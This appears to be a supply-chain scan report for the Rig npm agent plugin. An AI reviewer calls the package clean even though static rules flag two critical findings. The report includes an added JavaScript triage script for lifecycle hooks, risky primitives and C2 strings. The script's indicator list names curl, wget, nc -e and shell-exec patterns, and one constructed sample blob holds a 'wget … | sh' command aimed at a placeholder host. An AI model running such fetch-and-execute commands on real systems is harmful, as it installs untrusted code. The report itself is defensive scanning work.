AI Security Review
scanned 2d ago · by lpm-firewall-ai
No confirmed malicious attack surface was found. The package is an agent-harness plugin with expected file writes, process spawning, native runtime tools, and limited user-invoked network access.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
User imports/loads the Rig plugin or invokes Rig CLI/runtime commands.
Impact
Can modify Rig/agent runtime configuration and run controlled tools when explicitly used, but no unconsented install-time behavior or exfiltration was found.
Mechanism
Package-aligned agent runtime provisioning and tool materialization.
Rationale
Static inspection found high-risk primitives, but they are aligned with the declared Rig agent-harness purpose and are reached through explicit plugin capabilities or CLI/runtime entrypoints. I found no lifecycle execution, credential harvesting with exfiltration, persistence backdoor, destructive behavior, or unconsented AI-agent control-surface mutation.
Evidence
- package.json
- dist/src/plugin.js
- dist/src/agent-harness/rig-agent.js
- dist/src/session-hook-materializer-service.js
- dist/src/pi-command.js
- dist/src/pi-settings-materializer.js
- dist/src/skill-materializer.js
- dist/src/tooling/shell-tools.js
- native/linux-arm64/rig-shell
- native/linux-arm64/rig-tools
- .claude/settings.json
- .pi/settings.json
- .pi/skills/*/SKILL.md
- .rig/state/pi-managed-packages.json
- .rig/runtime/handoffs/*.json
- runtime home .ssh/known_hosts
- runtime bin/tool paths
Network endpoints (1)
registry.npmjs.org/-/v1/search
Decision evidence
public snapshot
AI called this Clean at 87.0% confidence as Benign with medium false-positive risk.
Evidence for block
- Ships native helper binaries under native/*/rig-shell and rig-tools.
- Runtime helpers can spawn controlled shells and materialize tool binaries when invoked.
- Writes provider-managed runtime files such as .claude/settings.json, .pi/settings.json, .rig/state, and runtime known_hosts.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks.
- Main export dist/src/plugin.js registers a Rig provider plugin; dangerous primitives are exposed as Rig CLI/capability actions, not import-time execution.
- Observed network use is limited to the npm registry search behind the rig pi search command and to run steering via a caller-provided serverUrl.
- Secret handling resolves expected runtime API keys into Rig runtime env/defines; no source exfiltration endpoint found.
- Session hook and Pi settings writes are plugin/config-driven, marked as managed entries, and preserve operator-authored entries.
- Native binary strings show Rig workspace/tool enforcement terms, with no obvious downloader or C2 strings.
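The three "Evidence against" checks above (no install-time lifecycle hooks, network use confined to the listed endpoint, no downloader or C2 strings in the native helpers) are the ones a reviewer would rerun locally before accepting a Clean verdict. The following is an added triage script, not code from the Rig package or from lpm-firewall-ai; it runs offline on constructed sample inputs. The pattern lists, the EXPECTED_HOSTS allowlist (seeded from the report's single network endpoint) and the sample package.json, source text and binary blobs are this example's own assumptions; it assumes Node.js 18 or later, where Buffer and URL are built in.

```javascript
// Added triage example: reproduces the report's "Evidence against" checks offline.
// Not code from the Rig package or from lpm-firewall-ai. Pattern lists and
// EXPECTED_HOSTS are this example's assumptions, not the scanner's policy.

// 1. Install-time execution: scripts under these names run during `npm install`.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepare", "prepublish", "preuninstall", "postuninstall",
];

function lifecycleHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((name) => Object.hasOwn(scripts, name));
}

// 2. High-risk primitives, env-var reads and URL literals in a JS source text.
//    Counts are leads for manual review, not a verdict: spawn() reached only from
//    a CLI entrypoint is what the rationale above calls "aligned" behaviour.
const PRIMITIVE_PATTERNS = {
  childProcess: /\b(?:spawn|spawnSync|exec|execSync|execFile|execFileSync|fork)\s*\(/g,
  fsWrite: /\b(?:writeFile|writeFileSync|appendFile|appendFileSync)\s*\(/g,
  network: /\b(?:fetch|https?\.request|https?\.get|net\.connect)\s*\(/g,
};
const ENV_READ_RE = /process\.env\.([A-Z0-9_]+)/g;
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

function scanSource(text) {
  const hits = {};
  for (const [name, re] of Object.entries(PRIMITIVE_PATTERNS)) {
    hits[name] = (text.match(re) || []).length;
  }
  const envVars = [...new Set([...text.matchAll(ENV_READ_RE)].map((m) => m[1]))];
  const urls = [...new Set(text.match(URL_RE) || [])];
  return { hits, envVars, urls };
}

// Hosts the report lists under "Network endpoints"; anything else needs a reason.
const EXPECTED_HOSTS = new Set(["registry.npmjs.org"]);

function unexpectedUrls(urls) {
  return urls.filter((u) => {
    try { return !EXPECTED_HOSTS.has(new URL(u).hostname); } catch { return true; }
  });
}

// 3. Native binaries: extract printable runs (like strings(1)) and look for
//    downloader / C2 style indicators. A hit means "read the disassembly", no more.
function printableStrings(buf, minLen = 6) {
  const out = [];
  let cur = "";
  for (const b of buf) {
    if (b >= 0x20 && b <= 0x7e) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) out.push(cur);
      cur = "";
    }
  }
  if (cur.length >= minLen) out.push(cur);
  return out;
}

const C2_INDICATORS = [/https?:\/\//i, /\b(?:curl|wget)\s/i, /\/bin\/sh\s+-c/i, /\bnc\s+-e\b/i, /base64\s+-d\b/i];

function suspiciousStrings(buf) {
  return printableStrings(buf).filter((s) => C2_INDICATORS.some((re) => re.test(s)));
}

// Constructed sample inputs (assumptions for this example, not taken from the package).
const SAMPLE_PACKAGE_JSON = {
  name: "example-rig-plugin",
  main: "dist/src/plugin.js",
  scripts: { build: "tsc", test: "node --test" },
};
const SAMPLE_SOURCE = `
const { spawn } = require("node:child_process");
const bin = process.env.RIG_CONTROLLED_BASH_BIN?.trim() || "";
const res = await fetch("https://registry.npmjs.org/-/v1/search?text=rig");
spawn(bin, args, { stdio: "inherit" });
`;
const BENIGN_BLOB = Buffer.from(
  "\x7fELF\x02\x01\x01\x00\x00\x00rig workspace enforcement\x00RIG_TASK_WORKSPACE\x00\x01\x02", "latin1");
const MALICIOUS_BLOB = Buffer.from(
  "\x7fELF\x02\x00\x00wget http://example.invalid/payload | sh\x00RIG_TASK_WORKSPACE\x00", "latin1");

// Whole-package triage: sources and binaries are maps of path -> content.
function triage(pkg, sources, binaries) {
  const scans = Object.fromEntries(Object.entries(sources).map(([f, t]) => [f, scanSource(t)]));
  return {
    lifecycleHooks: lifecycleHooks(pkg),
    unexpectedUrls: unexpectedUrls(Object.values(scans).flatMap((s) => s.urls)),
    suspiciousBinaryStrings: Object.fromEntries(
      Object.entries(binaries).map(([f, b]) => [f, suspiciousStrings(b)])),
    scans,
  };
}

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, { "dist/src/plugin.js": SAMPLE_SOURCE },
  { "native/linux-arm64/rig-shell": BENIGN_BLOB, "constructed/bad.bin": MALICIOUS_BLOB }), null, 2));
```

Run against a real tarball by reading package.json with JSON.parse and passing the dist/*.js texts and native/* buffers into triage(); an empty lifecycleHooks, an empty unexpectedUrls and empty suspiciousBinaryStrings reproduce the three bullets above, while childProcess and envVars hits still need the manual reachability check (is the primitive behind an explicit CLI/capability entrypoint or on the import path?) that the rationale relies on.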
Behavioral surface
- Child Process
- Environment Vars
- Filesystem
- Network
- High Entropy Strings
- Url Strings
- No License
Source & flagged code
3 flagged
dist/src/agent-harness/rig-agent.js
L15: const candidates = [
L16: process.env.RIG_CONTROLLED_BASH_BIN?.trim() || "",
L17: resolve(layout.binDir, "controlled-bash"),
...
L29: async function runControlledBash(args, options) {
L30: const projectRoot = process.env.RIG_HOST_PROJECT_ROOT?.trim() || process.env.PROJECT_RIG_ROOT?.trim() || process.env.RIG_TASK_WORKSPACE?.trim() || process.cwd() || options.projectR...
L31: const controlled = resolveControlledBash(projectRoot);
...
L38: stdin: "inherit",
L39: stdout: "inherit",
L40: stderr: "inherit",
...
L169: try {
L170: const parsed = JSON.parse(readFileSync(path, "utf-8"));
L171: return parsed && typeof parsed === "object" && !Array.isArray(parsed) ? parsed : null;
Critical
Persistence Backdoor
Source writes persistence or remote-access backdoor material.
dist/src/agent-harness/rig-agent.js · L15
Trigger-reachable chain: manifest.exports -> dist/src/agent-harness/rig-agent.js
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
dist/src/agent-harness/rig-agent.js · L15
native/linux-arm64/rig-shell
- path = native/linux-arm64/rig-shell
- kind = native_binary
- sizeBytes = 3029392
- magicHex = [redacted]
Medium
Ships Native Binary
Findings
2 Critical · 4 Medium · 4 Low
- Critical · Persistence Backdoor · dist/src/agent-harness/rig-agent.js
- Critical · Trigger Reachable Dangerous Capability · dist/src/agent-harness/rig-agent.js
- Medium · Network
- Medium · Environment Vars
- Medium · Ships Native Binary · native/linux-arm64/rig-shell
- Medium · Structural Risk Force Deep Review
- Low · Filesystem
- Low · High Entropy Strings
- Low · Url Strings
- Low · No License